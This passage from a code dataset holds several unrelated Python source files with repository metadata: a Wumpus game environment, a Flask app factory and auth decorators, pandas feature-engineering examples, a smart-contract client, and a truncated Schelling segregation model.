at_pit_ = layout_after_agent_action(rep, action, self.params)\n else:\n l, at_wumpus_, at_pit_ = layout_after_wumpus_action(rep, action, self.params)\n new_rep = copy.deepcopy(rep)\n new_rep.grid = l\n if rep.nact < self.params.max_actions[rep.player]:\n new_rep.nact += 1\n else:\n new_rep.nact = 1\n new_rep.player = opposite_player(rep.player)\n if self.params.use_next_player_as_feature:\n new_rep.next_player = identify_next_player(new_rep, self.params)\n setattr(new_rep, AT_WUMPUS, at_wumpus_)\n setattr(new_rep, AT_PIT, at_pit_)\n return self.__update_rep(new_rep)\n\n def __update_rep(self, rep):\n updated_rep = rep.to_dict()\n gstatus = self.check_game_status(rep)\n if gstatus == 1:\n updated_rep['goal'] = True\n elif gstatus == -1:\n updated_rep['deadend'] = True\n updated_rep['nmoves'] += 1\n return Bunch(updated_rep)\n\n @staticmethod\n def get_simplified_objects():\n return SIMPLIFIED_OBJECT\n\n def check_game_status(self, rep):\n if len(gold_positions(rep.grid)) == 0:\n return 1\n elif not agent_alive(rep):\n return -1\n else:\n return 0\n\n def available_actions(self, rep):\n layout = rep.grid\n actions = []\n if rep.player == PLAYER1:\n try:\n c0 = np.argwhere(layout == AGENT)[0]\n except:\n print('H')\n actions += PIECE_VALID_ACTIONS[AGENT](c0, rep, self.params)\n elif rep.player == PLAYER2:\n c0 = np.argwhere(layout == WUMPUS)[0]\n actions += PIECE_VALID_ACTIONS[WUMPUS](c0, rep, self.params)\n return actions\n\n def player2_policy(self, rep):\n ava_actions = self.available_actions(rep)\n return np.random.choice(ava_actions)\n\n def get_action_space(self):\n if not self.params.can_build_walls:\n return self.params.ava_actions[PLAYER1]\n else:\n return None\n\n @staticmethod\n def encode_op(rep, op):\n if not isinstance(op, tuple):\n return op\n else:\n return \"{}_{}.{}\".format(WALL, op[0], op[1])\n\n def init_instance(self, key):\n rep = {u: False for u in self.params.unary_predicates}\n rep['grid'] = generate_gird(key)\n rep['nact'] = 1\n rep['player'] = PLAYER1\n rep['goal'] = False\n rep['nmoves'] = 0\n 
rep['deadend'] = False\n assert AGENT in rep['grid'] and GOLD in rep['grid']\n rep[AT_WUMPUS] = False\n rep[AT_PIT] = None\n rep['next_player'] = identify_next_player(Bunch(rep), self.params)\n return Bunch(rep)\n\n# Helper mehtods =================================\n\ndef terminated(rep):\n if not agent_alive(rep) or len(gold_positions(rep.grid)) == 0:\n return 1\n else:\n return 0\n\n\ndef agent_alive(rep):\n if at_pit(rep) is not None:\n return False\n elif at_wumpus(rep):\n return False\n else:\n return True\n\n\ndef at_wumpus(rep):\n return getattr(rep, AT_WUMPUS)\n\n\ndef at_pit(rep):\n return getattr(rep, AT_PIT)\n\n\ndef agent_valid_actions(pos, rep, params):\n layout = rep.grid\n valid_action = []\n action_space = params.ava_actions[PLAYER1]\n for action_id, direction in ACTION_MOVE_DIRECTION.items():\n if not action_id in action_space:\n continue\n running_pos = np.add(pos, direction)\n if np.any(running_pos < 0):\n continue\n try:\n next_cell = layout[running_pos[0], running_pos[1]]\n except IndexError:\n continue\n if next_cell in {PIT, WUMPUS}:\n continue\n else:\n valid_action.append(action_id)\n return valid_action\n\n\ndef layout_after_agent_action(rep, action, params):\n layout = rep.grid\n assert AGENT in layout\n assert action in params.ava_actions[PLAYER1]\n at_wumpus_ = at_wumpus(rep)\n at_pit_ = at_pit(rep)\n l = layout.copy()\n agent_pos = np.argwhere(layout == AGENT)[0]\n running_pos = np.add(agent_pos, ACTION_MOVE_DIRECTION[action])\n assert not np.any(running_pos < 0)\n try:\n next_cell = l[running_pos[0], running_pos[1]]\n except:\n raise IndexError\n l[agent_pos[0], agent_pos[1]] = EMPTY\n if next_cell not in {PIT, WUMPUS}:\n l[running_pos[0], running_pos[1]] = AGENT\n elif next_cell in WUMPUS:\n at_wumpus_ = True\n elif next_cell in PIT:\n at_pit_ = (running_pos[0], running_pos[1])\n return l, at_wumpus_, at_pit_\n\n\ndef wumpus_valid_actions(pos, rep, params):\n layout = rep.grid\n valid_action = []\n action_space = params.ava_actions[PLAYER2]\n for action_id, direction in ACTION_MOVE_DIRECTION.items():\n if not action_id in action_space:\n continue\n running_pos = np.add(pos, direction)\n if np.any(running_pos < 0):\n continue\n try:\n next_cell = layout[running_pos[0], running_pos[1]]\n except IndexError:\n continue\n if next_cell in {GOLD, PIT}:\n continue\n else:\n valid_action.append(action_id)\n return valid_action\n\n\ndef layout_after_wumpus_action(rep, action, params):\n layout = rep.grid\n assert WUMPUS in layout\n assert action in params.ava_actions[PLAYER2]\n at_wumpus_ = at_wumpus(rep)\n at_pit_ = at_pit(rep)\n l = layout.copy()\n pos = np.argwhere(layout == WUMPUS)[0]\n running_pos = np.add(pos, ACTION_MOVE_DIRECTION[action])\n assert not np.any(running_pos < 0)\n try:\n next_cell = l[running_pos[0], running_pos[1]]\n except:\n raise IndexError\n assert next_cell not in {GOLD, PIT}\n l[pos[0], pos[1]] = EMPTY\n if next_cell in AGENT:\n at_wumpus_ = True\n l[running_pos[0], running_pos[1]] = WUMPUS\n return l, at_wumpus_, at_pit_\n\n\ndef gold_positions(layout):\n return np.argwhere(layout==GOLD)\n\n\n### Instances\n\ndef generate_gird(key):\n height, width, cell_agent, cell_wumpus, pits, golds =\\\n LAYOUTS[key]\n grid = np.full((height, width), EMPTY, dtype=object)\n grid[cell_agent] = AGENT\n grid[cell_wumpus] = WUMPUS\n for p_pos in pits:\n grid[p_pos] = PIT\n for g_pos in golds:\n grid[g_pos] = GOLD\n return grid\n\n\nLAYOUTS = {\n 0: (4, 4, (0, 0), (3, 3), {(1, 3), (1, 0), (2, 2), (3, 0), (0, 3)}, {(2, 3)}),\n 1: (3, 3, (0, 0), (2, 0), {(1, 
2), (1, 0), (2, 2)}, {(1, 2)}),\n 2: (6, 6, (4, 5), (4, 0), {(3, 0), (4, 4), (2, 2)}, {(1, 2), (0, 0)}),\n 3: (8, 8, (1, 1), (5, 5), {}, {(3, 4), (2, 2), (5, 0)}),\n 4: (5, 5, (1, 1), (4, 4), {(0, 1)}, {(4, 0)}),\n 5: (4, 4, (0, 0), (3, 3), {}, {(3, 0)}),\n 6: (3, 3, (2, 0), (0, 0), {}, {(1, 2)}),\n 7: (5, 5, (0, 0), (4, 1), {(2 ,0), (2 ,1), (2 ,2), (0, 4)}, {(2, 4)}),\n 8: (4, 4, (2, 3), (3, 0), {(2, 1)}, {(0, 1)}),\n 9: (4, 3, (0, 2), (3, 0), {(2, 1), (1, 1)}, {(3, 2), (0, 1)}),\n 9: (4, 3, (0, 2), (3, 0), {(2, 1), (1, 1)}, {(3, 2), (0, 1)}),\n}\n\n\n\n","repo_name":"iOrb/gpl","sub_path":"src/gpl/domains/grid_games/envs/wumpus.py","file_name":"wumpus.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32197368070","text":"import flask\nimport os\nimport yaml\nfrom flask_security import Security\nfrom flask_mail import Mail\nimport logbook\nimport logging\nfrom logbook.compat import redirect_logging\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom raven.contrib.flask import Sentry\nfrom werkzeug.exceptions import HTTPException\n\nfrom .utils.profiling import profile_request_start, profile_request_end\n\ndef create_app(config=None, setup_logging=True):\n if config is None:\n config = {}\n\n ROOT_DIR = os.path.abspath(os.path.dirname(__file__))\n\n app = flask.Flask(__name__, static_folder=None)\n app.wsgi_app = ProxyFix(app.wsgi_app)\n\n _CONF_D_PATH = os.environ.get('CONFIG_DIRECTORY', os.path.join(ROOT_DIR, \"..\", \"..\", \"conf.d\"))\n\n configs = [os.path.join(ROOT_DIR, \"app.yml\")]\n\n if os.path.isdir(_CONF_D_PATH):\n configs.extend(sorted(os.path.join(_CONF_D_PATH, x) for x in os.listdir(_CONF_D_PATH) if x.endswith(\".yml\")))\n\n configs.append(os.path.expanduser('~/.config/backslash/devconfig.yml'))\n\n for yaml_path in configs:\n if os.path.isfile(yaml_path):\n with open(yaml_path) as yaml_file:\n app.config.update(yaml.full_load(yaml_file))\n\n app.config.update(config)\n\n app.before_request(profile_request_start)\n app.after_request(profile_request_end)\n\n db_uri = os.environ.get('BACKSLASH_DATABASE_URI', None)\n if db_uri is not None or 'SQLALCHEMY_DATABASE_URI' not in app.config:\n app.config['SQLALCHEMY_DATABASE_URI'] = db_uri or 'postgresql://localhost/{0}'.format(app.config['app_name'])\n\n if setup_logging:\n del app.logger.handlers[:]\n redirect_logging()\n\n if os.environ.get('BACKSLASH_TESTING', '').lower() in {'1', 'yes', 'true'}:\n app.config['TESTING'] = True\n\n if app.config['TESTING']:\n app.config['TRACEBACK_DIR'] = '/tmp/backslash_tracebacks'\n else:\n _disable_logs(['dogpile.lock'])\n\n logging.getLogger('urllib3').setLevel(logging.WARNING)\n\n if not app.config['DEBUG'] and not app.config['TESTING']:\n app.config['RAVEN_IGNORE_EXCEPTIONS'] = (HTTPException, SystemExit,)\n sentry = Sentry(app) # pylint: disable=unused-variable\n\n override_tb_location = os.environ.get('BACKSLASH_TRACEBACKS_PATH', None)\n if override_tb_location:\n app.config['TRACEBACK_DIR'] = override_tb_location\n\n app.logger.info(\"Started\")\n\n Mail(app)\n\n from . import models\n from .blueprints import rest, views, runtoken\n from .blueprints.api.main import blueprint as api_blueprint\n\n models.db.init_app(app)\n\n from . 
import auth\n Security(app, auth.user_datastore, register_blueprint=False)\n\n blueprints = [auth.auth, views.blueprint, api_blueprint, rest.blueprint, runtoken.blueprint]\n\n from .errors import errors\n\n for blueprint in blueprints:\n app.register_blueprint(blueprint)\n\n for code in errors:\n app.errorhandler(code)(errors[code])\n\n return app\n\n\ndef _disable_logs(logger_names):\n\n logger_names = set(logger_names)\n\n def filter(record, _):\n return record.channel in logger_names\n\n logbook.NullHandler(filter=filter).push_application()\n","repo_name":"getslash/backslash","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"37743453961","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import cross_val_score\nfrom xgboost import XGBRegressor\n\ndef score_dataset(X, y, model=XGBRegressor()):\n # Label encoding for categoricals\n for colname in X.select_dtypes([\"category\", \"object\"]):\n X[colname], _ = X[colname].factorize()\n # Metric for Housing competition is RMSLE (Root Mean Squared Log Error)\n score = cross_val_score(\n model, X, y, cv=5, scoring=\"neg_mean_squared_log_error\",\n )\n score = -1 * score.mean()\n score = np.sqrt(score)\n return score\n\n# Prepare data\ndf = pd.read_csv(\"../input/fe-course-data/ames.csv\")\nX = df.copy()\ny = X.pop(\"SalePrice\")\n\n# Create math tranforms\nX_1 = pd.DataFrame() # dataframe to hold new features\nX_1[\"LivLotRatio\"] = df.GrLivArea / df.LotArea\nX_1[\"Spaciousness\"] = (df.FirstFlrSF + df.SecondFlrSF) / df.TotRmsAbvGrd\nX_1[\"TotalOutsideSF\"] = df.WoodDeckSF + df.OpenPorchSF + df.EnclosedPorch + df.Threeseasonporch + df.ScreenPorch\nX_1[[\"LivLotRatio\",\"Spaciousness\"]].head()\n\n# Create interation features between BldgType and GrLivArea\n# One-hot encode BldgType\nX_2 = pd.get_dummies(df.BldgType, prefix=\"Bldg\")\nX_2 = X_2.mul(df.GrLivArea, axis=0)\n# Get Multiplication of dataframe and other, element-wise.\n\n# Count how many of the following are > 0\nX_3 = pd.DataFrame()\nX_3[\"PorchTypes\"] = df[[\n \"WoodDeckSF\",\n \"OpenPorchSF\",\n \"EnclosedPorch\",\n \"Threeseasonporch\",\n \"ScreenPorch\",\n]].gt(0.0).sum(axis=1)\n\n# MSSubClass describes the type of a dwelling\ndf.MSSubClass.unique()\n\n# Create a feature containing only the first word of each type\nX_4 = pd.DataFrame()\nX_4[\"MSClass\"] = df.MSSubClass.str.split(\"_\", n=1, expand=True)[0]\n\n# Group transform\nX_5 = pd.DataFrame()\nX_5[\"MedNhbdArea\"] = (df.groupby(\"Neighborhood\")['GrLivArea'].transform('median'))\n\n# Join features\nX_new = X.join([X_1, X_2, X_3, X_4, X_5])\nscore_dataset(X_new, y)\n\n##########################################################################\n\n# Data visualization can suggest transformations,\n# often a \"reshaping\" of a feature through powers or logarithms.\n# The distribution of WindSpeed in US Accidents is highly skewed,\n# for instance. 
In this case the logarithm is effective at normalizing it:\n# If the feature has 0.0 values, use np.log1p (log(1+x)) instead of np.log\naccidents[\"LogWindSpeed\"] = accidents.WindSpeed.apply(np.log1p)\n# Plot a comparison\nfig, axs = plt.subplots(1, 2, figsize=(8, 4))\nsns.kdeplot(accidents.WindSpeed, shade=True, ax=axs[0])\nsns.kdeplot(accidents.LogWindSpeed, shade=True, ax=axs[1]);\n\n# Counts\n# Binary features (1 for Present, 0 for Absent) or boolean (True or False)\n# In Python, booleans can be added up just as if they were integers.\nroadway_features = [\"Amenity\", \"Bump\", \"Crossing\", \"GiveWay\",\n \"Junction\", \"NoExit\", \"Railway\", \"Roundabout\", \"Station\", \"Stop\",\n \"TrafficCalming\", \"TrafficSignal\"]\naccidents[\"RoadwayFeatures\"] = accidents[roadway_features].sum(axis=1)\naccidents[roadway_features + [\"RoadwayFeatures\"]].head(10)\n\n# Break down features\ncustomer[[\"Type\", \"Level\"]] = ( # Create two new features\n customer[\"Policy\"] # from the Policy feature\n .str # through the string accessor\n .split(\" \", expand=True) # by splitting on \" \"\n # and expanding the result into separate columns\n)\ncustomer[[\"Policy\", \"Type\", \"Level\"]].head(10)\n\n# Join features\nautos[\"make_and_style\"] = autos[\"make\"] + \"_\" + autos[\"body_style\"]\nautos[[\"make\", \"body_style\", \"make_and_style\"]].head()\n\n# Group Transforms\n# methods: max, min, mean, median, var, std, count\ncustomer[\"AverageIncome\"] = (\n customer.groupby(\"State\") # for each state\n [\"Income\"] # select the income\n .transform(\"mean\") # and compute its mean\n)\ncustomer[[\"State\", \"Income\", \"AverageIncome\"]].head(10)\n\ncustomer[\"StateFreq\"] = (\n customer.groupby(\"State\")\n [\"State\"]\n .transform(\"count\")\n / customer.State.count()\n)\ncustomer[[\"State\", \"StateFreq\"]].head(10)\n\n\n# Create a \"frequency encoding\" for a categorical feature\n# If you're using training and validation splits, to preserve their independence,\n# it's best to create a grouped feature using only the training set\n# and then join it to the validation set. 
We can use the validation set's merge method\n# after creating a unique set of values with drop_duplicates on the training set:\n\n# Create splits\ndf_train = customer.sample(frac=0.5)\ndf_valid = customer.drop(df_train.index)\n\n# Create the average claim amount by coverage type, on the training set\ndf_train[\"AverageClaim\"] = df_train.groupby(\"Coverage\")[\"ClaimAmount\"].transform(\"mean\")\n\n# Merge the values into the validation set\ndf_valid = df_valid.merge(\n df_train[[\"Coverage\", \"AverageClaim\"]].drop_duplicates(),\n on=\"Coverage\",\n how=\"left\",\n)\n\ndf_valid[[\"Coverage\", \"AverageClaim\"]].head(10)\n\n# Create splits\ndf_train = customer.sample(frac=0.5)\ndf_valid = customer.drop(df_train.index)\n\n# Create the average claim amount by coverage type, on the training set\ndf_train[\"AverageClaim\"] = df_train.groupby(\"Coverage\")[\"ClaimAmount\"].transform(\"mean\")\n\n# Merge the values into the validation set\ndf_valid = df_valid.merge(\n df_train[[\"Coverage\", \"AverageClaim\"]].drop_duplicates(),\n on=\"Coverage\",\n how=\"left\",\n)\n\ndf_valid[[\"Coverage\", \"AverageClaim\"]].head(10)\n","repo_name":"jianigao/Feature-Engineering","sub_path":"Creating-Features_Housing.py","file_name":"Creating-Features_Housing.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37688123526","text":"from contracting.execution.executor import Executor, DEFAULT_STAMPS\nfrom contracting.db.driver import ContractDriver, FSDriver\nfrom contracting.compilation.compiler import ContractingCompiler\nfrom contracting.stdlib.bridge.time import Datetime\nfrom datetime import datetime\nfrom functools import partial\nimport ast\nimport inspect\nimport astor\nimport autopep8\nfrom types import FunctionType\nimport os\n\nfrom . import config\n\nfrom .db.orm import Variable\nfrom .db.orm import Hash\n\n\nclass AbstractContract:\n def __init__(self, name, signer, environment, executor: Executor, funcs):\n self.name = name\n self.signer = signer\n self.environment = environment\n self.executor = executor\n self.functions = funcs\n\n # set up virtual functions\n for f in funcs:\n # unpack tuple packed in SenecaClient\n func, kwargs = f\n\n # set the kwargs to None. 
these will fail if they are not provided\n default_kwargs = {}\n for kwarg in kwargs:\n default_kwargs[kwarg] = None\n\n # each function is a partial that allows kwarg overloading and overriding\n setattr(self, func, partial(self._abstract_function_call,\n signer=self.signer,\n contract_name=self.name,\n executor=self.executor,\n func=func,\n # environment=self.environment,\n **default_kwargs))\n\n def keys(self):\n return self.executor.driver.get_contract_keys(self.name)\n\n # a variable contains a DOT, but no __, and no :\n # a hash contains a DOT, no __, and a :\n # a constant contains __, a DOT, and :\n\n def quick_read(self, variable, key=None, args=None):\n a = []\n\n if key is not None:\n a.append(key)\n\n if args is not None and isinstance(args, list):\n for arg in args:\n a.append(arg)\n\n k = self.executor.driver.make_key(contract=self.name, variable=variable, args=a)\n return self.executor.driver.get(k)\n\n def quick_write(self, variable, key=None, value=None, args=None):\n if key is not None:\n a = [key]\n else:\n a = []\n\n if args is not None and isinstance(args, list):\n for arg in args:\n a.append(arg)\n\n k = self.executor.driver.make_key(contract=self.name, variable=variable, args=a)\n\n self.executor.driver.set(k, value)\n self.executor.driver.commit()\n\n def run_private_function(self, f, signer=None, environment=None, **kwargs):\n # Override kwargs if provided\n signer = signer or self.signer\n environment = environment or self.environment\n\n # Let executor access private functions\n self.executor.bypass_privates = True\n\n # Append private method prefix to function name if it isn't there already\n if not f.startswith(config.PRIVATE_METHOD_PREFIX):\n f = '{}{}'.format(config.PRIVATE_METHOD_PREFIX, f)\n\n # Execute\n result = self._abstract_function_call(signer=signer, executor=self.executor, contract_name=self.name,\n environment=environment, func=f, metering=None, now=None, **kwargs)\n\n # Set executor back to restricted mode\n self.executor.bypass_privates = False\n\n return result\n\n def __getattr__(self, item):\n try:\n # return the attribute if it exists on the instance\n return self.__getattribute__(item)\n except AttributeError as e:\n\n # otherwise, attempt to resolve it. full name is contract.item\n fullname = '{}.{}'.format(self.name, item)\n\n # if the raw name exists, it is a __protected__ or a variable, so prepare for those\n if fullname in self.keys():\n variable = Variable(contract=self.name, name=item, driver=self.executor.driver)\n\n # return just the value if it is __protected__ to prevent sets\n if item.startswith('__'):\n return variable.get()\n\n # otherwise, return the variable object with allows sets\n return variable\n\n # otherwise, see if contract.items: has more than one entry\n if len(self.executor.driver.values(prefix=self.name + '.' + item + ':')) > 0:\n\n # if so, it is a hash. return the hash object\n return Hash(contract=self.name, name=item, driver=self.executor.driver)\n\n # otherwise, the attribut does not exist, so throw the error.\n raise e\n\n def now(self):\n d = datetime.today()\n return Datetime(d.year, d.month, d.day, hour=d.hour, minute=d.minute)\n\n def _abstract_function_call(self, signer, executor, contract_name, func, environment=None, stamps=DEFAULT_STAMPS, metering=None, now=None, **kwargs):\n # for k, v in kwargs.items():\n # assert v is not None, 'Keyword \"{}\" not provided. 
Must not be None.'.format(k)\n environment = environment or self.environment\n\n if now is None:\n now = self.now()\n\n if environment.get('now') is None:\n environment.update({'now': now})\n\n output = executor.execute(sender=signer,\n contract_name=contract_name,\n function_name=func,\n kwargs=kwargs,\n stamps=stamps,\n environment=environment,\n metering=metering)\n\n if executor.production:\n executor.sandbox.terminate()\n\n if output['status_code'] == 1:\n raise output['result']\n\n return output['result']\n\n\nclass ContractingClient:\n def __init__(self, signer='sys',\n submission_filename=os.path.join(os.path.dirname(__file__), 'contracts/submission.s.py'),\n driver=ContractDriver(),\n metering=False,\n compiler=ContractingCompiler(),\n environment={}):\n\n self.executor = Executor(metering=metering, driver=driver)\n self.raw_driver = driver\n self.signer = signer\n self.compiler = compiler\n self.submission_filename = submission_filename\n self.environment = environment\n\n # Get submission contract from file\n if submission_filename is not None:\n # Seed the genesis contracts into the instance\n with open(self.submission_filename) as f:\n contract = f.read()\n\n self.raw_driver.set_contract(name='submission',\n code=contract)\n\n self.raw_driver.commit()\n\n # Get submission contract from state\n self.submission_contract = self.get_contract('submission')\n\n def set_submission_contract(self, filename=None, commit=True):\n state_contract = self.get_contract('submission')\n\n if filename is None:\n filename = self.submission_filename\n\n if filename is None and state_contract is None:\n raise AssertionError(\"No submission contract provided or found in state.\")\n\n if filename is not None:\n with open(filename) as f:\n contract = f.read()\n\n self.raw_driver.delete_contract(name='submission')\n self.raw_driver.set_contract(name='submission',\n code=contract)\n if commit:\n self.raw_driver.commit()\n\n self.submission_contract = self.get_contract('submission')\n\n\n def flush(self):\n # flushes db and resubmits genesis contracts\n self.raw_driver.flush()\n self.raw_driver.clear_pending_state()\n\n if self.submission_filename is not None:\n self.set_submission_contract()\n\n # Returns abstract contract which has partial methods mapped to each exported function.\n def get_contract(self, name):\n contract = self.raw_driver.get_contract(name)\n\n if contract is None:\n return None\n\n tree = ast.parse(contract)\n\n function_defs = [n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)]\n\n funcs = []\n for definition in function_defs:\n func_name = definition.name\n kwargs = [arg.arg for arg in definition.args.args]\n\n funcs.append((func_name, kwargs))\n\n return AbstractContract(name=name,\n signer=self.signer,\n environment=self.environment,\n executor=self.executor,\n funcs=funcs)\n\n def closure_to_code_string(self, f):\n closure_code = inspect.getsource(f)\n closure_code = autopep8.fix_code(closure_code)\n closure_tree = ast.parse(closure_code)\n\n # Remove the enclosing function by swapping out the function def node with its children\n assert len(closure_tree.body) == 1, 'Module has multiple body nodes.'\n assert isinstance(closure_tree.body[0], ast.FunctionDef), 'Function definition not found at root.'\n\n func_def_body = closure_tree.body[0]\n closure_tree.body = func_def_body.body\n\n contract_code = astor.to_source(closure_tree)\n name = func_def_body.name\n\n return contract_code, name\n\n def lint(self, f, raise_errors=False):\n if isinstance(f, FunctionType):\n f, _ 
= self.closure_to_code_string(f)\n\n tree = ast.parse(f)\n violations = self.compiler.linter.check(tree)\n\n if violations is None:\n return None\n else:\n if raise_errors:\n for v in violations:\n raise Exception(v)\n else:\n return violations\n\n def compile(self, f):\n if isinstance(f, FunctionType):\n f, _ = self.closure_to_code_string(f)\n\n code = self.compiler.parse_to_code(f)\n return code\n\n def submit(self, f, name=None, metering=None, owner=None, constructor_args={}, signer=None):\n\n assert self.submission_contract is not None, \"No submission contract set. Try set_submission_contract first.\"\n\n if isinstance(f, FunctionType):\n f, n = self.closure_to_code_string(f)\n if name is None:\n name = n\n\n assert name is not None, 'No name provided.'\n\n if signer is None:\n signer = self.signer\n\n self.submission_contract.submit_contract(name=name, code=f, owner=owner, constructor_args=constructor_args,\n metering=metering, signer=signer)\n\n def get_contracts(self):\n if isinstance(self.raw_driver.driver, FSDriver):\n return self.raw_driver.driver.get_contracts()\n\n contracts = []\n for key in self.raw_driver.keys():\n if key.endswith('.__code__'):\n contracts.append(key.replace('.__code__', ''))\n return contracts\n\n def get_var(self, contract, variable, arguments=[], mark=False):\n return self.raw_driver.get_var(contract, variable, arguments, mark)\n\n def set_var(self, contract, variable, arguments=[], value=None, mark=False):\n self.raw_driver.set_var(contract, variable, arguments, value, mark)\n","repo_name":"Lamden/contracting","sub_path":"contracting/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":11491,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"81"} +{"seq_id":"14557978206","text":"import re\nfrom functools import wraps\nfrom flask import request\nfrom app.models.users import Users as User\n\n\ndef authenticate(func):\n @wraps(func)\n def inner_methos(*args, **kwargs):\n if \"Authorization\" in request.headers:\n token = request.headers.get(\"Authorization\")\n user = User.verify_token(token)\n if user:\n kwargs['user'] = user\n kwargs['token'] = token\n return func(*args, **kwargs)\n else:\n return {\"status\": \"failed\", \"message\": \"Not authorised\"}, 409\n else:\n return {\"status\": \"failed\", \"message\": \"Not authorised\"}, 409\n inner_methos.__doc__ = func.__doc__\n return inner_methos\n\n\ndef validate(params):\n def validate_wrapper(func):\n @wraps(func)\n def inner_method(*args, **kwargs):\n \"\"\" This method validates user input against a set of requiredninput using regex\"\"\"\n errors = {'missing': [], 'errors': []}\n for key in params.keys():\n if key in request.data:\n if len(request.data.get(key)) > 0:\n if params[key]['type'] == 'integer':\n regexp = re.compile(r\"(^[0-9]*$#)\")\n compare = request.data.get(key)\n if not regexp.match(compare):\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Please provide a valid integer'})\n\n if params[key]['type'] == 'text':\n regexp = re.compile(r\"(^[a-zA-Z0-9' ]*$)\")\n compare = request.data.get(key)\n if not regexp.match(compare):\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Please provide a valid string'})\n else:\n if 'min-length' in params[key] and len(compare.strip()) < params[key]['min-length']:\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Minimum length reached'})\n\n if params[key]['type'] == 'email':\n address = re.compile(\n 
r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\n compare = request.data.get(key)\n if not address.match(compare):\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Please provide a valid email'})\n else:\n errors['missing'].append(key)\n else:\n errors['missing'].append(key)\n\n if len(errors['missing']) > 0 or len(errors['errors']) > 0:\n return {'status': 'failed', 'message': 'Please check your input', 'errors': errors}, 400\n else:\n return func(*args, **kwargs)\n\n inner_method.__doc__ = func.__doc__\n return inner_method\n return validate_wrapper\n","repo_name":"devGenie/bucketlistAPI","sub_path":"app/common/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15650946728","text":"import math\nimport random\nimport numpy as np\nfrom scipy.stats import betabinom\n\ndef betabinom_mus(ALPHA, BETA, NUM_AGENTS):\n return betabinom.rvs(10, ALPHA, BETA, size=NUM_AGENTS) /10\n\ndef Moore_neighbors(row: int, col: int, NUM_ROW: int, NUM_COL: int) ->list:\n \"\"\"function which returns Moore neighbors list of (row, col)\"\"\"\n if row == 0:\n row_under, row_self, row_upper = NUM_ROW - 1, row, row + 1\n elif row == NUM_ROW - 1:\n row_under, row_self, row_upper = row - 1, row, 0\n else:\n row_under, row_self, row_upper = row - 1, row, row + 1\n\n if col == 0:\n col_under, col_self, col_upper = NUM_COL - 1, col, col + 1\n elif col == NUM_COL - 1:\n col_under, col_self, col_upper = col - 1, col, 0\n else:\n col_under, col_self, col_upper = col - 1, col, col + 1\n\n Moore_neighbors = [(row, col) for row in [row_under, row_self, row_upper] for col in [col_under, col_self, col_upper]]\n Moore_neighbors.remove((row, col))\n return Moore_neighbors\n\nclass Agent:\n def __init__(self, row:int, col:int, mu:float, p:float):\n # row, col in {0,1,2,...}\n # mu: membership value to A, mu in [0,1], in actual trial {0, 0.1, 0.2, ..., 1}\n # p: percent similar wanted, p in [0,1]\n self.row, self.col = row, col\n self.mu = mu\n self.p = p\n self.neighbor_agents_mu = []\n self.s_sq = None\n self.fuzzy = None\n self.percent_wanted_neighbor = None\n self.next_move = False\n\n def search_neighbors(self, agents_field):\n # picking up Moore neighbors address of self\n moore_neighbors_address = Moore_neighbors(self.row, self.col, agents_field.shape[0], agents_field.shape[1])\n # neighbors agents list\n neighbor_agents = [agents_field[address] for address in moore_neighbors_address]\n # neighbors agents mus list\n self.neighbor_agents_mu = [agent.mu for agent in neighbor_agents if agent != None]\n # s_sq: average neighbors similarity\n if len(self.neighbor_agents_mu) == 0:\n self.s_sq = None\n else:\n self.s_sq = 1 - np.mean((np.array(self.neighbor_agents_mu) - self.mu) ** 2)\n # fuzzy: fuzziness of A in the neighborhoods\n neighbor_incl_myself_mu = self.neighbor_agents_mu + [self.mu]\n self.fuzzy = np.mean([H(x) for x in neighbor_incl_myself_mu])\n\n def moving_decision(self):\n if len(self.neighbor_agents_mu) == 0:\n self.percent_wanted_neighbor = 0\n else:\n if self.mu > 0.5:\n self.percent_wanted_neighbor = len([mu for mu in self.neighbor_agents_mu if mu >= self.mu]) / len(self.neighbor_agents_mu)\n elif self.mu < 0.5:\n self.percent_wanted_neighbor = len([mu for mu in self.neighbor_agents_mu if mu <= self.mu]) / len(self.neighbor_agents_mu)\n else:\n self.percent_wanted_neighbor = 1\n if self.p == 0:\n self.next_move = False\n elif 
self.percent_wanted_neighbor >= self.p:\n self.next_move = False\n else:\n self.next_move = True\n\ndef initial_field_address(NUM_ROW: int, NUM_COL: int, NUM_AGENTS: int):\n #overall address list\n field_address = [(x, y) for x in range(NUM_ROW) for y in range(NUM_COL)]\n # initial occupied address list\n occupied_address = random.sample(field_address, NUM_AGENTS)\n # non occupied address list\n non_occupied_address = list(set(field_address) - set(occupied_address))\n return occupied_address, non_occupied_address\n\ndef initializing_field(NUM_ROW: int, NUM_COL: int, dtype=object):\n \"\"\"\n making 2 dimensional numpy array for storing agents' information\n \"\"\"\n field = np.zeros([NUM_ROW, NUM_COL], dtype=dtype)\n field[:,:] = None # if dtype is float, then nan\n return field\n\ndef H(p: float) ->float:\n \"\"\"\n binary entropy function. H: [0, 1] -> [0, 1]\n \"\"\"\n if p == 0 or p == 1:\n return 0\n else:\n return -p * math.log2(p) - (1 - p) * math.log2(1 - p)\n\ndef D(p: float, q: float) ->float:\n \"\"\"\n binary KL divergence\n \"\"\"\n if p == 1:\n if q == 0:\n return math.inf\n else:\n return p * math.log2(p / q)\n elif p == 0:\n if q == 1:\n return math.inf\n else:\n return (1 - p) * math.log2((1 - p) / (1 - q))\n else:\n if q == 0 or q == 1:\n return math.inf\n else:\n return p * math.log2(p / q) + (1 - p) * math.log2((1 - p) / (1 - 